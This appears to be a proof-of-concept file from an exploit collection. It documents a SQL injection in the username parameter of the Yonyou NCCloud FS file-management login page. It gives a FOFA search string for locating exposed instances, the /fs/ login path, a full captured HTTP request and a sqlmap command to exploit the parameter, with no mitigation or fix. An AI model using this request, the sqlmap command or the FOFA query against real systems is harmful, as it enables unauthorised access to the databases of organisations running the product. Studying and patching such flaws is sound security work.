Awesome-POC/OA产品漏洞/用友 NCCloud FS文件管理SQL注入.md
2022-12-05 11:09:28 +08:00

53 lines
1.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 用友 NCCloud FS文件管理SQL注入
## 漏洞描述
用友 NCCloud FS文件管理登录页面对用户名参数没有过滤存在SQL注入
## 漏洞影响
```
用友 NCCloud
```
## FOFA
```
"NCCloud"
```
## 漏洞描述
登录页面如下
![yongyou-6-1](./images/yongyou-6-1.png)
在应用中存在文件服务器管理登录页面
```plain
http://xxx.xxx.xxx.xxx/fs/
```
![yongyou6-2](./images/yongyou6-2.png)
登录请求包如下
```plain
GET /fs/console?username=123&password=%2F7Go4Iv2Xqlml0WjkQvrvzX%2FgBopF8XnfWPUk69fZs0%3D HTTP/1.1
Host: xxx.xxx.xxx.xxx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: JSESSIONID=2CF7A25EE7F77A064A9DA55456B6994D.server; JSESSIONID=0F83D6A0F3D65B8CD4C26DFEE4FCBC3C.server
Connection: close
```
使用Sqlmap对**username参数** 进行SQL注入
```plain
sqlmap -r sql.txt -p username
```
![yongyou-6-3](./images/yongyou-6-3.png)